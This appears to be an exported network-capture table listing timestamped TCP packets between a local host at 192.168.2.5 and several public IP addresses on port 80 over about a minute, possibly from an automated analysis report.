                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.046494007 CET5005280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.063070059 CET5005380192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.068507910 CET805005372.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.068566084 CET5005380192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.068813086 CET5005380192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.068835020 CET5005380192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.074172974 CET805005372.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.074187040 CET805005372.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.902734041 CET805005372.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.902880907 CET5005380192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.902934074 CET5005380192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.906598091 CET5005480192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.908469915 CET805005372.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.912101030 CET805005472.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.912192106 CET5005480192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.912318945 CET5005480192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.912353992 CET5005480192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.917836905 CET805005472.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.917869091 CET805005472.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.725184917 CET805005472.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.725276947 CET5005480192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.725627899 CET5005480192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.731724977 CET805005472.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.741964102 CET5005580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.748025894 CET805005544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.748111010 CET5005580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.748231888 CET5005580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.748266935 CET5005580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.753669024 CET805005544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.754019976 CET805005544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.424982071 CET805005544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.425162077 CET5005580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.434840918 CET805005544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.434911966 CET5005580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.439990044 CET5005680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.445496082 CET805005618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.445581913 CET5005680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.445733070 CET5005680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.445733070 CET5005680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.451330900 CET805005618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:05.861463070 CET805006334.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:05.861660004 CET805006334.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.679814100 CET805006334.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.680195093 CET5006380192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.688065052 CET805006334.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.688142061 CET5006380192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.882041931 CET5006480192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.887557030 CET805006434.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.887651920 CET5006480192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.887774944 CET5006480192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.887804985 CET5006480192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.893213034 CET805006434.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.893250942 CET805006434.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.864963055 CET805006434.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.868782043 CET5006480192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.875051975 CET805006434.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.875129938 CET5006480192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.887623072 CET5006580192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.893210888 CET805006518.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.893280029 CET5006580192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.893467903 CET5006580192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.893503904 CET5006580192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.899084091 CET805006518.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.899142981 CET805006518.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.790822983 CET805006518.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.791062117 CET5006580192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.803889036 CET805006518.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.803992987 CET5006580192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.807908058 CET5006680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.813678980 CET805006647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.813774109 CET5006680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.813956976 CET5006680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.813987017 CET5006680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.819514990 CET805006647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.820050955 CET805006647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.247664928 CET805006647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.247998953 CET5006680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.254595995 CET805006647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.254684925 CET5006680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.364406109 CET5006780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.371494055 CET805006713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.371582985 CET5006780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.371886015 CET5006780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.371917963 CET5006780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.377883911 CET805006713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.378479004 CET805006713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.836721897 CET805006713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.837136030 CET5006780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.842998028 CET805006713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.843075991 CET5006780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.853681087 CET5006880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.859380960 CET805006818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.859469891 CET5006880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.859622955 CET5006880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.859649897 CET5006880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.865607977 CET805006818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.866082907 CET805006818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:12.522706032 CET805006818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:12.523103952 CET5006880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.085071087 CET5007580192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.085160971 CET5007580192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.098843098 CET5007680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.101341009 CET805007518.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.101401091 CET5007580192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.104198933 CET805007647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.104254961 CET5007680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.104408026 CET5007680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.104423046 CET5007680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.109734058 CET805007647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.110299110 CET805007647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.532591105 CET805007647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.533056974 CET5007680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.538985014 CET805007647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.539113998 CET5007680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.547883034 CET5007780192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.554702044 CET805007744.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.554821014 CET5007780192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.555071115 CET5007780192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.555151939 CET5007780192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.560607910 CET805007744.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.560637951 CET805007744.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.219712019 CET805007744.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.219883919 CET5007780192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.226288080 CET805007744.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.226361036 CET5007780192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.233441114 CET5007880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.238955021 CET805007844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.239029884 CET5007880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.239156008 CET5007880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.239190102 CET5007880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.244942904 CET805007844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.244973898 CET805007844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.907759905 CET805007844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.907954931 CET5007880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.913816929 CET805007844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.913892031 CET5007880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.922235966 CET5007980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.927637100 CET805007918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.927714109 CET5007980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.928023100 CET5007980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.928083897 CET5007980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.933446884 CET805007918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.933631897 CET805007918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.365535021 CET805007918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.365890026 CET5007980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.678330898 CET5007980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.733189106 CET805007918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.733372927 CET5007980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.737296104 CET805007918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.741017103 CET805007918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.741071939 CET5007980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:25.502527952 CET6056980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:25.508161068 CET806056918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:25.508285999 CET6056980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:25.508419991 CET6056980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:25.510689020 CET6056980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:25.513751984 CET806056918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:25.518452883 CET806056918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.132667065 CET5998780192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.138355017 CET805998718.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.138439894 CET5998780192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.138528109 CET5998780192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.138571978 CET5998780192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.144108057 CET805998718.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.144222975 CET805998718.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.801428080 CET805998718.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.801671028 CET5998780192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.807804108 CET805998718.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.807879925 CET5998780192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.815819025 CET5998880192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.821239948 CET805998835.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.821336031 CET5998880192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.821470976 CET5998880192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.821496964 CET5998880192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.826900959 CET805998835.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.827095032 CET805998835.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.771967888 CET805998835.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.772171021 CET805998835.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.772182941 CET5998880192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.772241116 CET5998880192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.777889013 CET805998835.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.977440119 CET5998980192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.982969999 CET805998934.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.983059883 CET5998980192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.983169079 CET5998980192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.983206987 CET5998980192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.989787102 CET805998934.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.989830017 CET805998934.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:36.832375050 CET805998934.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:36.832590103 CET5998980192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:36.839827061 CET805998934.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:36.839900970 CET5998980192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.026038885 CET5999080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.032510042 CET805999044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.032748938 CET5999080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.032885075 CET5999080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.032885075 CET5999080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.038243055 CET805999044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.038392067 CET805999044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.722570896 CET805999044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.722827911 CET5999080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.729553938 CET805999044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.729635000 CET5999080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.738262892 CET5999180192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.743784904 CET805999154.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.743973017 CET5999180192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.744014025 CET5999180192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.744014025 CET5999180192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.749633074 CET805999154.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.750081062 CET805999154.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.610407114 CET805999154.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.610629082 CET5999180192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.617867947 CET805999154.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.617954016 CET5999180192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.626127958 CET5999280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.631695986 CET805999235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.631911039 CET5999280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.037810087 CET5999880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.044269085 CET805999818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.044368982 CET5999880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.053329945 CET5999980192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.059117079 CET805999918.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.059245110 CET5999980192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.059422016 CET5999980192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.059459925 CET5999980192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.064858913 CET805999918.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.065104008 CET805999918.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.892080069 CET805999918.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.898118973 CET5999980192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.904174089 CET805999918.246.231.120192.168.2.5
